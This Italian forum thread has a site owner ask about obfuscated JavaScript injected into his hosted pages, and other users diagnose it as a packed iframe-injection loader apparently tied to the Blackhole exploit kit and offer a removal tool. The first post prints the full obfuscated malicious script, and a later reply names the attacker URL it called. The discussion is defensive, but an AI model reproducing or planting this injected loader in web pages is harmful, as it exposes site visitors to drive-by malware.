|
| HOMEPAGE | INDICE FORUM | REGOLAMENTO | ::. | NEI PREFERITI | .:: | RSS Forum | RSS News | NEWS web | NEWS software | |
| PUBBLICITA' | | | ARTICOLI | WIN XP | VISTA | WIN 7 | REGISTRI | SOFTWARE | MANUALI | RECENSIONI | LINUX | HUMOR | HARDWARE | DOWNLOAD | | | CERCA nel FORUM » | |
27-01-2013, 20.33.42 | #1 |
Junior Member
Registrato: 28-02-2007
Messaggi: 193
|
Cos’è questo strano codice ?
ho costruito un piccolo sito in HTML su hosting free, in alcune pagine ci trovo questo strano codice che qualcuno aggiunge forse il gestore dell’hosting. <script type="text/javascript" language="javascript" > ww=window;v="v"+"al";if(ww.document)try{document.b ody=12;}catch(gdsgsdg){asd=0;try{q=document.create Element("div");}catch(q){asd=1;}if(!asd){w={a:ww}. a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,3 2,122,11,7,32,31,30,29,118,96,112,29,105,118,100,1 05,115,31,59,29,100,110,97,114,109,100,108,113,46, 98,112,98,97,115,99,66,108,100,107,98,110,115,38,3 6,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30 ,29,32,104,117,99,108,114,44,112,114,98,30,58,32,3 8,102,113,116,111,56,44,47,118,117,116,46,104,98,1 06,101,107,99,113,116,113,109,107,105,98,95,43,105 ,115,45,103,115,46,97,108,117,109,114,98,114,45,11 0,101,112,38,57,10,10,31,30,29,32,104,117,99,108,1 14,44,112,116,120,106,98,46,111,109,112,105,115,10 3,108,110,31,59,29,39,96,96,112,111,107,115,113,10 1,38,57,10,10,31,30,29,32,104,117,99,108,114,44,11 2,116,120,106,98,46,97,109,111,100,100,112,29,61,3 1,37,45,39,58,11,7,32,31,30,29,105,118,100,105,115 ,45,113,113,121,107,99,43,104,100,103,100,104,115, 30,58,32,38,47,109,120,38,57,10,10,31,30,29,32,104 ,117,99,108,114,44,112,116,120,106,98,46,118,103,9 7,116,103,30,58,32,38,47,109,120,38,57,10,10,31,30 ,29,32,104,117,99,108,114,44,112,116,120,106,98,46 ,107,99,99,116,31,59,29,39,48,110,117,39,58,11,7,3 2,31,30,29,105,118,100,105,115,45,113,113,121,107, 99,43,116,110,110,29,61,31,37,46,112,119,37,56,13, 9,11,7,32,31,30,29,105,101,30,37,33,99,109,96,117, 108,99,107,116,45,101,98,116,68,106,98,109,100,108 ,113,66,120,71,97,40,38,103,116,102,107,113,36,41, 40,30,120,13,9,30,29,32,31,30,29,32,31,98,108,99,1 16,107,98,110,115,44,116,114,104,114,98,40,38,58,9 7,105,117,30,102,100,60,90,36,105,118,100,105,115, 91,37,59,60,46,98,102,118,61,37,38,59,12,8,29,32,3 1,30,29,32,31,30,97,111,98,115,106,101,109,114,43, 103,100,114,66,108,100,107,98,110,115,64,118,73,99 ,38,36,105,118,100,105,115,38,39,43,97,111,110,98, 110,99,65,101,105,107,98,37,105,118,100,105,115,40 ,57,10,10,31,30,29,32,124,11,7,125,40,38,38,59);}w =f;s=[];for(i=0;-i+505!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String. fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd) {xz(s)}</script><!--/b5bee1--> A volte Avast lo rileva Cosa sarà ? Grazie dell’attenzione. |
28-01-2013, 12.30.09 | #2 |
Gold Member
WT Expert
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
|
Rif: Cos’è questo strano codice ?
E' quasi sicuramente uno script il cui codice NON vuole essere trasparente all'utente. L'array contiene una sequenza di codici ASCII apparentemente senza senso, ma che lo acquisiscono attraverso un algoritmo appositamente predisposto. La stringa equivalente viene ricavata dal codice
Codice:
for(...){ s=s+String.fromCharCode((1*w[j]+e("j%4"))) } Il codice può non essere nocivo, non è detto sia un malware, ma certamente nascosto; Potrebbe essere invadente oltre misura, ossia inutile al fine che il sito che si prefigge. Purtroppo è pratica comune su tutti i fronti. ps: Perchè AVAST lo rileva ? Perchè con ogni probabilità, AVAST non esegue per conto del browser quell'algoritmo (non è così evoluto, è l'intelligenza umana a superare quella della macchina, notoriamente meccanica e priva di fantasia), ricavando il codice contenuto in 's' prima che il browser lo esegua, bensì rileva una chiamata ad una o più API di sistema da parte del motore JS ritenuta pericolosa. Per tale motivo (principalmente), o si evita di eseguire lo script e/o gli oggetti ad esso legati (vedi NoScript), oppure si esegue il browser in un ambiente virtualizzato che ha ragione di esistere fino a quando il browser è attivo e non intacca l'ambiente entro il quale opera il S.O. |
29-01-2013, 22.17.44 | #3 |
Junior Member
Registrato: 28-02-2007
Messaggi: 193
|
Rif: Cos’è questo strano codice ?
Chiarissimo, ho imparato ancora.
Grazie |
06-06-2013, 19.13.47 | #4 |
Newbie
Registrato: 06-06-2013
Messaggi: 4
|
Rif: Cos’è questo strano codice ?
se tu hai fatto il sito, teoricamente dovresti sapere per quale motivo c'è tale codice.
Sinceramente è a me risulta essere un malware, Blackhole Exploit Kit. |
06-06-2013, 19.58.12 | #5 |
Newbie
Registrato: 06-06-2013
Messaggi: 4
|
Rif: Cos’è questo strano codice ?
confermo i miei sospetti.
in qualità di reverser mi son incuriosito e preso la briga di decrittografare quello script. in effetti si tratta di un packer javascript il quale esegue del codice che va a sua volta a scrivere nella pagina creando un iframe injection che apre connessioni verso http://cel-design.com/test/dtd.php (url che al momento non esiste più). detto in una parola, è un malware. se ne hai bisogno scrivo un programma che ti pulisce dal malware... ma attenzione se è entrato quel coso significa che il tuo sito è vulnerabile! Predator |
07-06-2013, 10.19.56 | #6 |
Gold Member
WT Expert
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
|
Rif: Cos’è questo strano codice ?
Grande Predator75, hai sicuramente fatto un ottimo lavoro.
Il fatto che AVAST abbia rilevato il malware è perchè ha tenuto sotto controllo il link contenuto nel frame rielaborato dal browser, ed identificato il malware da te segnalato presso quel link, probabilmente prima che avvenisse il download in locale. Il problema, adesso, non è tanto fornire a bepi il tool di rimozione del malware (se AVAST ha bloccato l'accesso, il suo PC non è infetto...forse ha infettato altri utenti privi di antivirus che si sono connessi allo stesso sito ?), quanto segnalare al gestore dell'hosting che è lui ad avere i server compromessi. ps: Suggerisco che debba essere bepi a segnalare al gestore il fatto. Inoltre, considera che bepi ha esplicitamente affermato che quello è codice aggiunto da qualcuno, non da lui stesso. Il perchè sia presente quel codice, deve essere chiaro ad entrambi |
07-06-2013, 10.45.24 | #7 |
Newbie
Registrato: 06-06-2013
Messaggi: 4
|
Rif: Cos’è questo strano codice ?
Grazie LoryOne,
concordo il problema potrebbe gravare non tanto sul sito, ma sul server. A livello di utenza non c'è problema, quel codice non può infettare un browser in nessun modo, genera solo traffico non voluto ad ogni apertura di pagina. Inoltre i browser nuovi utilizzano sandbox ed è difficilissimo infettarli. Tra l'altro incredibile coincidenza ieri, dopo che ho letto questo topic, un mio collaboratore mi ha contattato perchè ha il sito di un suo cliente infettato dallo stesso malware! Oggi se ho un attimo di tempo pubblico il sorgente e l'exe cosi' da poter ripulire automaticamente tutte le pagine dal codice malevolo. |
07-06-2013, 11.03.22 | #8 |
Gold Member
WT Expert
Registrato: 09-01-2002
Loc.: None of your business
Messaggi: 5.505
|
Rif: Cos’è questo strano codice ?
Grazie a te Predator75.
Per quanto riguarda l'exe, non so se gli admin di questo forum lo renderanno pubblico a lungo, ma il sorgente è sempre ben accetto. Ad ogni modo, continuo a suggerire che sia necessario verificare la compromissione dei server, anche perchè, come già evidenziato da bepi, alla pagina viene aggiunto codice non esplicitamente immesso dal webmaster del sito ospitato. |
07-06-2013, 16.47.48 | #9 |
Newbie
Registrato: 06-06-2013
Messaggi: 4
|
Rif: Cos’è questo strano codice ?
Condivido il tool di rimozione,
https://www.dropbox.com/s/c424wt2e0h...emover_SCR.rar sorgente ed eseguibile compilato per coloro che non sono programmatori. LoryOne, se googli un attimo il mio nick associato all'argomento del reversing, vedi che sono una persiona seria, non ho mai fatto cavolate con tool, anzi sempre reversato malware per scoprirne i responsabili Concettualmente il tool è molto semplice, tramite delle regex filtra il contenuto del malware e ri-salva la pagina pulita. Bepi mi raccomando fai il backup prima di sovrascrivere le pagine, non si sa mai!!! e scopri dove è la falla nel sito, presto potrebbe entrare qualcosa di davvero dannoso. Ciao Predator |
Utenti attualmente attivi che stanno leggendo questa discussione: 1 (0 utenti e 1 ospiti) | |
Strumenti discussione | |
|
|
Discussioni simili | ||||
Discussione | Autore discussione | Forum | Risposte | Ultimo messaggio |
[javascript] memorizzare selezioni di un campo select di un modulo | bietolino | Programmazione | 4 | 14-05-2007 12.05.02 |
Genuine intel (R) CPU T2060 @ 1.60GHz? | smithcome | Hardware e Overclock | 68 | 08-03-2007 19.33.02 |
Impossibile Caricare il drive di periferica per questo Hardware (codice 39) | input | Hardware e Overclock | 2 | 18-10-2006 17.40.49 |
Euroscettico | Billow | Chiacchiere in libertà | 75 | 17-12-2004 17.57.42 |
Aiuto x Drive Image 7 | SONOTRANOI | Software applicativo | 10 | 13-11-2004 03.13.11 |